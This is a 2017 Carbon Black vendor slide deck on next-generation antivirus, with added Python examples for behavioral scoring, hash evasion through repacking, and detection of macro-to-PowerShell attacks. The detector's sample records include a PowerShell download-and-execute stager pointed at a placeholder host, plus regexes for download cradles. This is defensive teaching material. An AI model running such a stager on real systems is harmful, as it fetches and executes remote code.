Next-Generation Antivirus:
Evolving Your Security to Defend
Against Modern Attacks
Bernie Png
Senior Regional Security Engineer
March 14, 2017
© 2016 Carbon Black. All Rights Reserved.
What We’ll Cover Today
Is traditional antivirus working?
What is Next Generation Antivirus (NGAV)?
Is Traditional Antivirus Working?
Ransomware’s Annual Take
2015: $325M
2016: $1 Billion
Daily Ransomware Attacks
On average, 4,000 attacks happen each day (chart axis: 500 per day to 5,000 per day). This is a 300% increase over 2015.
How many?
Attack categories: known malware, obfuscated malware, scripting attacks, PowerShell, ransomware, memory attacks, remote login, macros, unknown malware.
Unknown malware was used to launch 38% of cyber attacks in 2015.
Guess The Attack
…
Source: Carbon Black
Nearly one-half of orgs have experienced ransomware in the last 12 months.
AV-Test.org Results, June 2016 (detection scores for May 2016 and June 2016)
Vendors tested: AVG, F-Secure, Kaspersky, Symantec, Bitdefender, G Data, Trend Micro
Thirteen of the fourteen vendor-month scores are 100%; the remaining one is 99.4%.
Cognitive Dissonance: the state of having inconsistent thoughts, beliefs, or attitudes, especially as relating to behavioral decisions and attitude change.
Traditional Antivirus No Longer Works
Endpoint stack shown: email scanner, personal firewall, URL scanner, traditional antivirus.
TRADITIONAL ANTIVIRUS
Traditional AV takes a malware-centric view of endpoint security, identifying malicious software by matching it to pre-identified signatures and heuristics.
• Malware identification
• Signatures & heuristics
• Decide once, forget forever
Antivirus targets malware.
1. The Adversary Automates
Attacker writes malicious code → raw malware repository (100 million malware files) → screen out detected files using multiple AV engines @ 99% effectiveness → zero-day arsenal (the 1 million malware files that pass the screen undetected)
3. The Adversary Adapts
Specialized malware:
√ Anti-signaturing
√ Anti-reverse engineering
√ Anti-debugging
√ Anti-sandboxing
Next-Gen AV: A Whole New Approach To Stopping The Attacker
Endpoint stack shown: email scanner, personal firewall, URL scanner, traditional antivirus, next-generation antivirus.
TRADITIONAL ANTIVIRUS
Traditional AV takes a malware-centric view of endpoint security, identifying malicious software by matching it to pre-identified signatures and heuristics.
• Malware identification
• Signatures & heuristics
• Decide once, forget forever
NEXT-GENERATION ANTIVIRUS
NGAV takes a system-centric view of endpoint security, examining every process on every endpoint to algorithmically detect and block the malicious tools, tactics, techniques, and procedures upon which attackers rely.
• Long-term analysis to detect attacker patterns
• Data science & threat intelligence
• Deep attack context & insight
What Is A TTP?
Tactics, Techniques, and Procedures: specific, identifiable patterns of malicious activity, discovered through analysis and correlation of files and behavior.
RAW DATA (collected by a low-level background scan): MD5, SHA256, network, system calls, file access, config/registry, active processes and executables
TTPs derived from it: modify network settings, persist, run system apps, list processes, scrape memory, inject code, read user data, drop code, downloaded file, fake location, listen on service port, beaconing, C2 channels, etc.
Billions of Signatures vs. 200 Techniques
Technique categories: File System, Fake Application/Location, Network, Security, System, User Input, Process
Techniques: find a file; upload file; download file from emailed URL; code drop; read user data (calendar, email, etc.); create/modify executable files; establish network connections; listen on network service port; communicate with low-reputation site; beaconing; C2 channels; modify network settings; persist/install; create another process; run system apps and tools; list processes; memory scraping; code injection; plugin injection; kill another process; hide processes; reverse command shell; reverse C2; buffer overflow; packed code; privilege escalation; inject input; modify registry; modify configuration; harvest passwords; disable security software; capture keystrokes; enable mic/webcam; read from clipboard; take screenshots
How TTPs Stop Malware
Timeline (reputation, behavior, attack vector): Known malware variant → TERMINATE
NGAV TTP Analysis
How TTPs Stop Complex Attacks
Timeline (reputation, behavior, attack vector): Unknown app → Read security data → Has injected code → Run system utility → Packed call → TERMINATE
NGAV TTP Analysis
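The two timelines above describe a verdict that accumulates over a process's lifetime rather than a one-shot file decision. The following is an added example, not Carbon Black code: a toy TTP accumulator in which every observed behavior adds a weight scaled by the process's reputation, and the process is terminated once the running score crosses a threshold. The TTP names, weights, reputation factors, threshold and the event stream are all constructed for illustration; a known-bad variant is killed on its first event, an unknown binary is killed after the fourth weak signal, and a known-good agent doing two of the same things is left alone.

```python
"""Added example (not Carbon Black code): TTP accumulation over a process lifetime.

Event stream, TTP names, weights, reputation factors and threshold are all
constructed assumptions for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Weight of each observed TTP (assumed values).
TTP_WEIGHTS: Dict[str, float] = {
    "KNOWN_MALWARE_VARIANT": 10.0,  # hash/reputation hit: decisive on its own
    "READ_SECURITY_DATA": 2.0,
    "HAS_INJECTED_CODE": 4.0,
    "RUN_SYSTEM_UTILITY": 1.0,
    "PACKED_CALL": 2.0,
    "BEACONING": 3.0,
}
# Reputation scales the weight: a known-good signed binary that reads security
# data is far less interesting than an unknown binary doing the same.
REPUTATION_FACTOR: Dict[str, float] = {"KNOWN_GOOD": 0.25, "UNKNOWN": 1.0, "KNOWN_BAD": 3.0}
TERMINATE_AT = 8.0


@dataclass
class ProcessState:
    reputation: str
    score: float = 0.0
    ttps: List[str] = field(default_factory=list)
    terminated_on: Optional[str] = None  # the TTP that pushed the score over the line


def analyze(reputations: Dict[int, str],
            events: List[Tuple[int, int, str]]) -> Dict[int, ProcessState]:
    """Replay (time, pid, ttp) events in time order and score each process.

    The decision is re-evaluated on every new behavior, so a chain of
    individually weak signals can still terminate the process.
    """
    state = {pid: ProcessState(rep) for pid, rep in reputations.items()}
    for _time, pid, ttp in sorted(events):
        proc = state[pid]
        if proc.terminated_on is not None:
            continue  # already killed; ignore anything recorded after that
        proc.ttps.append(ttp)
        proc.score += TTP_WEIGHTS.get(ttp, 0.0) * REPUTATION_FACTOR[proc.reputation]
        if proc.score >= TERMINATE_AT:
            proc.terminated_on = ttp
    return state


# Constructed telemetry: three processes observed over a few seconds.
REPUTATIONS = {1204: "UNKNOWN", 2330: "KNOWN_GOOD", 3111: "KNOWN_BAD"}
EVENTS = [
    (0, 3111, "KNOWN_MALWARE_VARIANT"),  # the "How TTPs Stop Malware" case
    (1, 1204, "READ_SECURITY_DATA"),     # the "complex attack" sequence starts
    (1, 2330, "READ_SECURITY_DATA"),     # a known-good agent doing the same thing
    (3, 1204, "HAS_INJECTED_CODE"),
    (4, 2330, "RUN_SYSTEM_UTILITY"),
    (5, 1204, "RUN_SYSTEM_UTILITY"),
    (7, 1204, "PACKED_CALL"),            # score reaches 9.0 here -> terminate
    (8, 1204, "BEACONING"),              # never scored: process is already gone
]

if __name__ == "__main__":
    for pid, proc in analyze(REPUTATIONS, EVENTS).items():
        verdict = f"TERMINATE on {proc.terminated_on}" if proc.terminated_on else "allow"
        print(pid, proc.reputation, f"score={proc.score:.2f}", proc.ttps, verdict)
```

The reputation factor is what keeps this from being a point-in-time rule: the same READ_SECURITY_DATA event contributes 2.0 for an unknown binary and 0.5 for a known-good one, so the false-positive exposure is concentrated on unknown code, which is also where signatures have nothing to say.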
NEXT-GEN AV: System-Centric vs Malware-Centric
NEXT-GEN AV: holistic monitoring of every process over time, whether malicious or not
• File attributes
• File contents
• File heuristics
• Access patterns
• Registry
• Configuration
• Network activity
• System calls
TRADITIONAL AV: point-in-time identification of malware based on simple rules
• File attributes
• File contents
• File heuristics
NEXT-GEN AV: Data Science and Behavioral Pattern-Matching
• Behavioral analytics
• Machine learning
• Patterns of attack
• Reputation scoring
• Relationship tracking
Lightweight prevention on the endpoint; deep detection & analytics in the cloud; adaptive learning; extensible; high efficacy.
NEXT-GEN AV: Deep Attack Context & Insight
1. How did this start?
2. What happened prior to detection?
3. Where else does this apply?
4. What could the impact have been?
5. Should I do anything to recover?
6. Are there holes I should close?
Prevention (block, alert) → integration → response & remediation → improved security posture
NEXT-GEN AV: Malware, Malware-less, and Malicious Use of Good Software
Obfuscated Malware
Malware is obfuscated or packed multiple times → malware unpacks itself when run → malicious code is free to execute
Doesn’t match any traditional signatures; NGAV spots the malware and blocks it
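Why repacking beats "decide once, forget forever", as an added example (not Carbon Black code): a toy XOR packer stands in for a real crypter and re-packs the same payload under different seeds. Every variant has a different SHA-256, so the hash signature taken from the one lab sample matches none of them, while a check keyed to what actually executes after the stub unpacks itself still matches every time. Shannon entropy is included as the generic file heuristic that flags packing. The payload, the seeds and the packer are all constructed; a real packer would wrap a PE, but the effect on hashes and entropy is the same.

```python
"""Added example (not Carbon Black code): why repacking defeats hash signatures.

The packer, payload and seeds are constructed stand-ins for illustration.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

# Constructed low-entropy stand-in for the real malicious code.
PAYLOAD = b"ECHO run ransom payload; " * 40


def keystream(seed: bytes, length: int) -> bytes:
    """SHA-256 in counter mode: a deterministic, seed-dependent byte stream."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def pack(payload: bytes, seed: bytes) -> bytes:
    """Toy packer: 4-byte seed header followed by payload XOR keystream(seed)."""
    body = bytes(p ^ k for p, k in zip(payload, keystream(seed, len(payload))))
    return seed + body


def unpack(blob: bytes) -> bytes:
    """What the stub does at run time: recover the original code in memory."""
    seed, body = blob[:4], blob[4:]
    return bytes(b ^ k for b, k in zip(body, keystream(seed, len(body))))


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); packed or encrypted code sits near the top."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# "Decide once, forget forever": the hash of the one sample seen in the lab.
SIGNATURES = {sha256_hex(PAYLOAD)}


def signature_scan(blob: bytes) -> bool:
    """Traditional check on the on-disk artifact, which the attacker controls."""
    return sha256_hex(blob) in SIGNATURES


def runtime_scan(blob: bytes) -> bool:
    """Check keyed to what actually executes after the stub unpacks itself."""
    return sha256_hex(unpack(blob)) in SIGNATURES


def demo(variant_count: int = 5) -> Dict[str, float]:
    """Pack the same payload under several seeds and compare the two checks."""
    variants = [pack(PAYLOAD, i.to_bytes(4, "big")) for i in range(variant_count)]
    return {
        "distinct_hashes": len({sha256_hex(v) for v in variants}),
        "signature_hits": sum(signature_scan(v) for v in variants),
        "runtime_hits": sum(runtime_scan(v) for v in variants),
        "plain_entropy": round(shannon_entropy(PAYLOAD), 2),
        "packed_entropy_min": round(min(shannon_entropy(v[4:]) for v in variants), 2),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Entropy alone only says "this looks packed or encrypted"; legitimate installers, compressed resources and DRM-protected games score just as high, which is why a packed-code indicator is one TTP weighed alongside behavior rather than a verdict on its own.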
NEXT-GEN AV: Malware, Malware-less, and Malicious Use of Good Software
Backdoor Binary Attack
Attacker hides shellcode in an EXE’s empty space → program opens a secret back door → malicious activity through remote access!
Signatures and file-based machine learning will miss this; NGAV finds these behaviors and blocks them.
NEXT-GEN AV: Malware, Malware-less, and Malicious Use of Good Software
PowerWare Attack
User launches malicious macro → PowerShell downloads ransomware → files encrypted!
AV misses: there is no malicious software file to match. NGAV blocks before files are encrypted.
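Detecting the PowerWare-style chain above from process-creation telemetry, as an added example (not Carbon Black code). The records are constructed in the shape of process-creation events (parent image, image, command line); the field names, the Office and script-host lists, the regexes and the BLOCK/ALERT rule are assumptions for illustration. The check combines lineage (an Office application spawning a script host) with command-line evidence (evasion switches, download cradles, and the decoded contents of -EncodedCommand), so it fires on the behavior even though no malicious binary ever lands on disk.

```python
"""Added example (not Carbon Black code): spotting a macro -> PowerShell download chain.

Records are constructed in the shape of process-creation telemetry. Field
names, process lists, regexes and the BLOCK/ALERT rule are assumptions.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download cradles and execution primitives commonly seen in stagers.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
    r"Start-BitsTransfer|Invoke-Expression|\biex\b", re.I)
# Switches that hide the window or bypass profile/execution policy.
EVASION_FLAGS = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"ep\s+bypass|exec(?:utionpolicy)?\s+bypass|enc(?:odedcommand)?)\b", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 of UTF-16LE script; recover it for inspection."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons this process creation looks malicious (empty if none)."""
    reasons = []
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office-spawns-script-host:{parent}->{child}")
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
        # Swap the opaque base64 blob for the decoded script before pattern matching.
        cmd = ENCODED_ARG.sub(" ", cmd) + " " + decoded
    if EVASION_FLAGS.search(cmd):
        reasons.append("evasion-flags")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-cradle")
    return reasons


def verdict(event: Dict[str, str]) -> Tuple[str, List[str]]:
    """BLOCK when Office lineage meets download/encoded evidence; ALERT on weaker stacks."""
    reasons = assess(event)
    lineage = any(r.startswith("office-spawns-script-host") for r in reasons)
    if lineage and ("download-cradle" in reasons or "encoded-command" in reasons):
        return "BLOCK", reasons
    if len(reasons) >= 2:
        return "ALERT", reasons
    return "ALLOW", reasons


def encode_command(script: str) -> str:
    """Build a realistic -EncodedCommand argument for the constructed records."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


OFFICE = r"C:\Program Files\Microsoft Office\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"

# Constructed process-creation records (not real telemetry).
EVENTS = [
    {"pid": 4012, "parent_image": OFFICE + r"\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + encode_command(STAGER)},
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
    {"pid": 4377, "parent_image": OFFICE + r"\EXCEL.EXE", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell -nop -w hidden -c "' + STAGER + '"'},
    {"pid": 4500, "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": "powershell.exe -NoP -EncodedCommand " + encode_command("Get-ChildItem C:\\Logs | Remove-Item")},
]

if __name__ == "__main__":
    for event in EVENTS:
        decision, reasons = verdict(event)
        print(event["pid"], decision, reasons)
```

Two caveats a practitioner will want. Encoded, profile-less PowerShell is routine in legitimate administration (the scheduled-task record above), which is why that record only alerts; blocking on the encoding alone would break real tooling. And the lineage check depends on the macro using a direct child process: a macro that launches PowerShell through WMI (Win32_Process.Create) shows up with WmiPrvSE.exe as the parent, so the Office-to-script-host rule needs a sibling rule for that path.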
TRADITIONAL AV: ineffective protection that is easily bypassed by the modern attacker
NEXT-GEN AV: targets all the attacker’s tools, techniques, tactics, and procedures
Ready To Jump In?
NGAV EVALUATION CRITERIA
1. Protection from malware & malware-less attacks
2. Extensible cloud analytics
3. Visibility & context
4. Integrated response
5. Lightweight operations
6. Group-based policies and security growth path
Seek 3rd-party guidance on
ABOUT CARBON BLACK
#1: market-leading application control; market-leading incident response; next-generation antivirus
25 of Fortune 100; 2,000 organizations; 7M+ licenses; 10,000 practitioners; 70+ IR/MSSPs
Cb ENDPOINT SECURITY PLATFORM